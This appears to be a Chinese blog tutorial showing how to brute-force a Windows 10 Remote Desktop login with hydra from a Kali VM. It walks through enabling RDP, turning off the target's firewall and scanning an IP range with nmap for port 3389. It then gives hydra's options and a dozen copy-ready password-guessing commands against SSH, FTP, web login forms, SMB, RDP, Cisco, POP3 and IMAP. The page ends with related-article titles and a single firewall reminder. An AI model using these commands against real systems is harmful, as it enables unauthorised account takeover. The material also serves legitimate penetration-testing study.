hydra暴力破解win10用户名和密码
hydra暴力破解win10用户名和密码
准备工作:win10计算机开启3389端口和关闭防火墙
- 开启3389端口
3389端口:Windows 10远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器。
在桌面上右击“我的电脑”,选择“属性”,点击左边“远程设置”,选择“允许连接到此计算机”。
- 此外,为了让扫描更加顺利,我们还需要关闭win10计算机的防火墙。当然我们也可以借助nmap来穿透防火墙进行扫描,这一点以后会演示给大家。
“win+R”并输入命令:“cmd”打开win10计算机的终端,并输入命令"firewall.cpl"来打开防火墙的设置。
在显示的页面中,在左侧选择“开启或关闭windows Defender 防火墙”,最后将“专用网络”与“公用网络”的防火墙,均关闭。
另外,我们还需要保证kali虚拟机与win10系统的网络是互通的。
例如:
kali的ip地址:192.168.1.130,win10的ip地址为192.168.1.138。
这样,在kali的终端输入:ping 192.168.1.138,在win10终端输入:ping 192.168.1.130,就可以看到kali与win10之间的网络是互通的。
windows计算机中查看ip地址的命令:ipconfig。
kali虚拟机中查看ip地址的命令:ifconfig。
并且,ping命令在windows计算机中发送3次,会自动停止。而kali虚拟机中,则会一直向被测试的win10计算机发送测试数据。我们要想终止,就事用命令:ctrl+C。
在实际操作中,我发现:kali虚拟机要想ping通 win10计算机,必须先将win10的防火墙关闭。
- 使用namp 批量扫描 ,哪些开启3389端口。
在kali虚拟机中的终端输入命令:nmap -p 3389 192.168.1.10-255 。
hydra(九头蛇)
hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
官 网:http://www.thc.org/thc-hydra。
- 参数说明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 -t TASKS 同时运行的线程数,默认为16。 -w TIME 设置最大超时的时间,单位秒,默认是30s。 -v / -V 显示详细过程。 server 目标ip service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。 OPT 可选项
- 攻击案例
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb 9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3 10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V 11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18 12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- 详细案例
RDP 是 Remote Display Protocal(远程显示协议)的缩写,是微软公司基于多用户 Windows 系统开发的远程连接协议。
- 详细案例
hydra暴力破解win10用户名和密码
B站演示连接:https://www.bilibili.com/video/BV1bh411y7i5
- 为了大家的计算机网络安全,一定要打开防火墙和win10自带的安全软件Defender。
hydra暴力破解win10用户名和密码相关推荐
- 第八天 02.hydra暴力破解ssh密码以及ftp密码
hydra暴力破解ssh密码 实验环境: windows7 ,kali 实验步骤: windows进入hydra目录 cd 命令 使用命令爆破SSH hydra -l 用户名 -p 密码字典 ss ...
- hydra暴力破解ssh密码
环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool. 下面是官网上的介绍: AFP, Cisco AAA, Cisco auth, Cisco enable, C ...
- 利用kali暴力破解获取windows账号密码
利用kali暴力破解获取windows账号密码 步骤一:打开图形化软件hydra-gk 步骤二:设置目标系统地址 步骤三:选择用户名和密码 步骤四:设置任务编号和超时时间 步骤五:检查配置,然后选择s ...
- 用Metasploit破解ftp用户名和密码
Metasploit是渗透测试人员在世界各地的资源和工具,比较常用的命令: msfconsole--直接进入 show options--查看 set RHOSTS +ip地址/段 use +路径 需 ...
- 暴力破解sshd服务的密码的小技巧
暴力破解sshd服务的密码的小技巧 准备环境 1:在虚拟机上准备一台XP系统 2:开启两台
- Hydra暴力破解工具的用法
目录 Hydra 常见参数 破解SSH 破解FTP 破解HTTP 破解3389远程登录 Kali自带密码字典 dirb dirbuster fern-wifi metasploit wfuzz Hyd ...
- Hydra暴力破解神器使用教程
Hydra hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,不过常用于破解各种协议的密码 支持的协议 支持在线破解的服务协议: adam ...
- 利用kali hydra 暴力破解Windows7(hydra的基本用法)会继续更新
Hydra的简单介绍 Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录.数据库.SSH.FTP等服务,支持Linux.Windows.Mac平台安 ...
- hydra笔记-利用hydra暴力破解ssh弱口令
这里我搭了台虚拟机.ssh开放的22端口.用户名密码都是root. 下载windows版本的hydra GitHub - maaaaz/thc-hydra-windows at v9.1 解压就可以了 ...
- hydra暴力破解ftp-telnet-mysql-ssh-http
目录结构 简介: 一.FTP 1.FTP简介: FTP 是仅基于 TCP 的服务,不支持 UDP(防止丢包),与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口).通常来说这 ...
最新文章
- K-最近邻法(KNN) C++实现
- 《http权威指南》读书笔记 二
- Struts 2创始人Patrick Lightbody看《精通Struts 2:Web 2.0开发实战 》
- JavaScript 日期格式化 简单有用
- 关于AJAX访问数据库不能及时获得更新数据的问题
- Java AOP研究之@Aspect注解的工作原理
- leetcode 198. 打家劫舍 思考分析
- kv存储对抗关系型数据库
- Update From 用法
- c语言面试会问10个数排序吗,c语言面试最必考的十道试题,求职必看!!!
- 目标检测——YOLOV3的学习笔记
- PHP自定义查询,php – 实体字段类型自定义查询参数
- 3使用技巧_办公小技巧:3+2 灵活使用WPS集成环境
- sigprocmask系统调用
- JAVA GUI创作简易记牌器
- pythonselenium模拟登陆爬取信息_python3 使用selenium模拟登陆天眼查抓取数据
- oracle是gbk程序是utf8的,oracle数据库gbk转utf8
- 【Error】Android: java.lang.RuntimeException: Can't toast on a thread that has not called Looper.prepa
- Markdown使用指南
- 车间生产管理系统(工厂数字化管理系统软件)
热门文章
- selenium 下载webdriver浏览器驱动
- 微信整人假红包图片_整人的微信红包玩法!微信红包图片整人!
- 手机验证码登录 添加 区号,国家,国家简写,国家中文名称,国旗展示
- 华为s5500t服务器硬盘,HuaweiOceanStor1T SAS 7.2K3.5寸WD1003FBYXS5500T存储硬盘
- UML统一建模语言习题一
- nodejs 配置全局 globle 缓存 catch
- 网易云音乐代码如何写入html,如何将网易云音乐加入到自己的网站!
- 又是一年平安夜,程序员教你用trutle画苹果,有手就行
- 【语义分割—SegNet】SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation
- 微信号复制统计工具源码